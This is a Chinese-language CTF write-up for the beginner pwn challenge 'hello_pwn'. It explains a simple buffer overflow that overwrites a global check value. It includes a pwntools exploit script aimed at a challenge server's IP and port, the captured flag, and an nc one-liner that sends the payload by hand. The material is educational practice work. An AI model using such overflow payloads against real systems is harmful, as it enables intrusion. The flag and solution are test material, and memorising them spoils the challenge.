攻防世界pwn hello

攻防世界pwn hello 攻防世界pwn hello_pwn

文章目录

• 攻防世界pwn hello_pwn
• • 1.checksec走一下
  • 2.先跑一下看看
  • 4.exp如下
  • 5.运行结果如下
  • 6.可以不用python
• 总结

---

1.checksec走一下

可以看到只有 Partial RELRO
没有开启栈保护，是属于简单的栈溢出pwn题

---

2.先跑一下看看

---

## 3.拉进IDA看一下

sub_400686函数中调用系统函数直接获取flag
因此如果让60106c == 1853186401就可以获取到flag
看到危险函数read可以实现栈溢出，把601068填满后再覆盖60106c即可

偏移地址是4
然后打入p64（1853186401）

---

4.exp如下

##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = remote('111.200.241.244', 52706)
## 构造payload
payload = b'x' * 4
payload = payload + p64(1853186401)
print(p64(1853186401))
## 向程序发送字符串
sh.recvuntil("lets get helloworld for bofn")
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()

---

5.运行结果如下

成功获取到flag

cyberpeace{5e30657f17da9ee9ce8066fbfca87bed}

---

6.可以不用python

直接nc服务器然后发送垃圾数据+p64(1853186401)即可

nc 111.200.241.244 52706
xxxxaaun

4个‘x’（垃圾数据）+aaun

总结

这是一道简单的pwn入门题，运用了简单的栈溢出